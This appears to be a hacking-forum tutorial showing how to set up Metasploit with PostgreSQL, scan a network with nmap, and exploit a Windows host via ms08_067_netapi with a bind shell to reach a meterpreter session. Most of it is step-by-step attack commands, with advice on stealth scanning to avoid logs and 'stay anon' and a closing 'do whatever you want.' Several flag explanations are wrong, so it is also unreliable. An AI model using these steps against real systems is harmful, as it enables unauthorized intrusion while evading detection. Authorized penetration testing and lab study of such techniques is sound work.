Using metasploit and its exploits

Welcome again to another ultra noob edition production. :) I know everyone likes colors but I am indeed just going to be very straightforward since I'm in happy land right now.

NOTE: I am not responsible for anything you do with this information. It is for educational purposes only.


First off we are going to set up metasploit with postgresql. (which I use... but you can also use sqlite3 or mysql) These Structured Query Language (SQL) databases are going to be what hold the information of a target after scans and such.


For those of you using windows, you can go here.


Click Me!


For this instalment of ultra noob edition i will be using blackbuntu. You can download blackbuntu
here!

To download backtrack you can go
here!

So once you have postgresql and its deamon running you need to run the following commands to create a user and password for your metasploit database.


In blackbuntu and backtrack 5 you will use the commands

Code:
service postgresql start
In backtrack 4r2 and below use;
Code:
/etc/init.d/postgresql-8.3 start
Note: you might have postgresql-8.4 as i do... so replace the 3 with a 4.
Code:
sudo su postgres -c psql
  ALTER USER postgres WITH PASSWORD 'your password';

  \q

  sudo passwd -d postgres
  sudo su postgres -c passwd
Note: if using backtrack ignore the sudo commands as you are already root.

What this does is set up a user postgres with whatever password you choose.


Now to create/connect to the postgresql database in metasploit you need to use the commands. Once inside metasploit.

Code:
db_connect postgres:yourpassword@127.0.0.1/msf3

[Image: metasploit1.png]

This will create a postgresql database called msf3 if you haven't already. If you have it will just connect to it. (As shown in mine)

This is where the show really gets going.
Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan.

To use a ping scan with nmap you would use nmap from the db_nmap command because it automatically adds hosts in the network to your new postgresql database.

Code:
db_nmap -Pn -v 192.168.1.1-255

[Image: metasploit2.png]

Now the -Pn argument tells nmap to run a ping scan on port 80 to decide what hosts are up and will add them to your database, while the -v command tells nmap to run in verbose mode giving you more detailed feedback while the scan is running.

Now after you have a list of live hosts you can run nmap in a new mode.
Code:
db_nmap -sS -sV -sU -n -O -v 192.168.1.4

[Image: metasploit3.png]

NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.

THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS.

Now i run the ip 192.168.1.4 because that is what is currently on my network.

The -sS command runs a stealth syn scan which does not create a full tcp connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port which will come into play when selecting an exploit to use.
The -sU command runs a udp port scan against the target, and since there is no reply from udp packets they never get logged in the first place. The -O scan runs an OS scan against the target using tcp fingerprinting to tell you the operating system of the target machine, this will also come to play when selecting an exploit. The -n command tells nmap to not run a -Pn or ping scan agianst the target as they get logged, and since you have already done that once you wouldn't want to do it again.
And again the -v command runs nmap in verbose mode which allows you to see more of whats going on in the behind the scenes and helps you better understand what is happening.

Now once you have a list of open ports you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit.


Now since port 445 is open I will attempt to run the ms08_067_netapi exploit against the target. So with metasploit open we will run

Code:
use windows/smb/ms08_067_netapi
set payload windows/bind_tcp
set rhost 192.168.1.4
set lhost 192.168.1.3
set lport 5150
check
NOTE:Run the show options command to display what information is required for the exploit to work properly.

[Image: metasploit4.png]


Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit.

The second sets metasploit to use a bind shell using tcp protocal.



The third sets the remote host to our target ip. The fourth sets the localhost to our ip, and the local port the one we want to listen on.

Running the check command will tell us if the target is vulnerable or not.

And as you can see it is. So now we will run the exploit command

Code:
exploit

[Image: metasploit5.png]

From there meterpreter will open. You can go here for all the meterpreter commands.




Now your in.... All you need to do is to do whatever you want. LOL

This Has been another ultra noob edition tutorial.

References


http://www.backtrack-linux.org/forums/ba...resql.html


http://hackforums.net/showthread.php?tid=970352


If I missed a ref or something let me know. I will fix it immediatly.


P.S. Will be adding things and command explanations as necissary just P.M. me for any help or explanations.


Also would very much appreciate feedback on what I could improve within the tut and whether or not it was enjoyed/helpful.





P.S.S. Am still making the cracking WPA with aircrack tutorial.... pretty much was just too lazy to do it recently as i am going to be a father... :)


Really? no feedback or anything about this post? Thats disapointing.. if i cant get more then a single thank you i might as well stop making tuts